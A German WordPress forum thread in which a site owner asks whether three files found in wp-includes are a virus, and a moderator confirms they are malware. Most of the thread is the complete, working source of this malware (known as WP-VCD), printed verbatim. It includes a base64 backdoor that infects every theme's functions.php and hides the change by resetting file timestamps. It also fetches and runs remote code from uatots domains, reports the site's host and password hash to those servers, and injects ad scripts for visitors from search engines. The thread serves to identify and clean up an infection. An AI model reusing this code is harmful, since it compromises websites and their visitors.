Support » Allgemeine Fragen » Ist das ein Virus?

  • polymathy

    (@polymathy)


    Hallo zusammen,

    ich habe in meiner wp-includes auf einer meiner WordPress Seiten folgende drei Dateien gefunden, die mir sehr verdächtig vorkommen. Kann jemand etwas dazu sagen?

    wp-feed.php

    62.216.202.219
    62.216.202.123
    85.13.131.124
    123.231.125.91
    213.83.37.107
    78.34.106.43
    87.78.222.234
    89.0.244.169
    89.0.99.144
    194.8.222.194
    89.0.221.195
    131.220.249.241
    89.1.192.117
    78.35.198.5
    49.149.186.132
    87.79.165.196
    124.121.98.11
    123.231.122.242
    103.55.102.32
    112.196.143.69

    wp-tmp.php

    ini_set('display_errors', 0);
    error_reporting(0);
    $wp_auth_key='98768a4b036341fe570ba4eb79941ed9';
    
    if ( ! function_exists( 'slider_option' ) ) {  
    
    function slider_option($content){ 
    if(is_single())
    {
    
    $con = '
    ';
    
    $con2 = '
    
    <script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=2002264"></script>
    <script src="//basepush.com/ntfc.php?p=2002267" data-cfasync="false" async></script>
    ';
    
    $content=$content.$con2;
    }
    return $content;
    } 
    
    function slider_option_footer(){ 
    if(!is_single())
    {
    
    $con2 = '
    
    <script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=2002264"></script>
    <script src="//basepush.com/ntfc.php?p=2002267" data-cfasync="false" async></script>
    ';
    
    echo $con2;
    }
    } 
    
    function setting_my_first_cookie() {
      setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
      }
    
    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }
    
    if( current_user_can('edit_others_pages'))
    {
    
    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }
    
    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
    
    }
    
    }
    
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
      if (strpos($ref,$source)!==false) {
        setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    	$sevisitor=true;
      }
    }
    
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    }
    
    }
    
    } 
    
    }

    wp-vcd.php

    <?php
    error_reporting(0);
    ini_set('display_errors', 0);
    
    	$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nOTg3NjhhNGIwMzYzNDFmZTU3MGJhNGViNzk5NDFlZDknOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWF0b3RzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnVhdG90cy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy51YXRvdHMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWF0b3RzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';
    	
    	$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    	$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    	
    
    			$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
    				
    			$ping = true;
    				$ping2 = false;
    			if ($list = scandir( $themes ))
    				{
    					foreach ($list as $_)
    						{
    						
    							if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
    								{
    									$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
    										
    									if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
    										{
    											if (strpos($content, 'WP_V_CD') === false)
    												{
    													$content = $install_code . $content ;
    													@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
    													touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    												}
    											else
    												{
    													$ping = false;
    												}
    										}
    										
    								}
    								
    								
    								                              else
                                                                {
                                                                $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
    					                                 foreach ($list2 as $_2)
    					                                      	{
    															
    
                                                                                        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
    								                      {
    									$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
    										
    									if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
    										{
    											if (strpos($content, 'WP_V_CD') === false)
    												{
    													$content = $install_code . $content ;
    													@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
    													touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    													$ping2 = true;
    												}
    
    											else
    												{
    													//$ping = false;
    												}
    										}
    										
    								}
    
                                                                                      }
    
                                                                }
    								
    								
    								
    								
    								
    								
    						}
    						
    					if ($ping) {
    						$content = @file_get_contents('http://www.uatots.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    						//@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.uatots.com/admin.txt'));
    					}
    					
    															if ($ping2) {
    						$content = @file_get_contents('http://www.uatots.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    						//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uatots.com/admin.txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
    					}
    					
    					
    					
    				}
    		
    
    ?><?php error_reporting(0);?>
Ansicht von 4 Antworten - 1 bis 4 (von insgesamt 4)
  • Moderator Bego Mario Garde

    (@pixolin)

    Hallo @polymathy und willkommen im Forum,

    ja, das ist Malware. Schau dir mal unseren FAQ-Beitrag Seite gehackt, was tun? an. Ich habe vor einer Weile auch mal die Arbeitsschritte zur Bereinigung einer Website beschrieben. Das kannst du hier nachlesen:
    https://pixolin.de/arbeitsschritte-reparatur-gehackte-website/

    Thread-Starter polymathy

    (@polymathy)

    Vielen Dank! Dann mache ich mich mal ans Werk!

    alfredx

    (@alfredx)

    Wow!

    Wie hast du herausgefunden, dass deine Website gehackt wurde?

    Das ist sicher mega schwierig 🙁

    Thread-Starter polymathy

    (@polymathy)

    In der functions.php des Themes das ich verwende war auf einmal Code enthalten, den ich dort nicht hingepackt hab. Einige Teile des Codes waren verschlüsselt, zudem konnte man sehen, dass eine Verbindung zu einer bestimmten URL aufgebaut wurde.

    Also hab ich mal nachgelesen, was man tun sollte um zu überprüfen, ob man gehackt wurde, hab alle Dateien abgescannt, unter anderem die WordPress Core Dateien durchsucht und dabei diese weiteren Dateien hier entdeckt.

    Da ich als Webentwickler ständig mit dem WordPress-Code arbeite sehe ich solche Sachen dann auch sofort. Es gibt aber auch Plugins für WordPress, die die Seite ständig überwachen und nach möglichen ungewollten Veränderungen im Code absuchen, wie z. B. das Plugin Sucuri.

    • Diese Antwort wurde geändert vor 4 Jahre von polymathy.
    • Diese Antwort wurde geändert vor 4 Jahre von polymathy.
    • Diese Antwort wurde geändert vor 4 Jahre von polymathy.
Ansicht von 4 Antworten - 1 bis 4 (von insgesamt 4)
  • Das Thema „Ist das ein Virus?“ ist für neue Antworten geschlossen.